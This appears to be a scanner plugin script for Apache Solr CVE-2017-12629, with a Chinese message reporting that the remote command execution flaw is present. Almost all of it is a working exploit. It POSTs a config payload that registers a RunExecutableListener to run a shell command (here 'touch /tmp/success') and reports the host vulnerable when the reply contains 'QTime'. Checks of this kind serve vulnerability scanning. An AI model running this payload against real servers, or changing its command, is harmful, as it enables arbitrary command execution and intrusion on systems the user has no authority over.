#request url = var
#define payload =/solr/demo/config
#define bug = QTime
#define info = 存在Apache Solr 远程命令执行漏洞（CVE-2017-12629）
#define post = {"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}

function main(args)
{
	res = HttpPost(url.payload,post,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
	if(StrFindStr(res[0],bug,0)!= "-1")
	{
		print(url.info);
	}
}
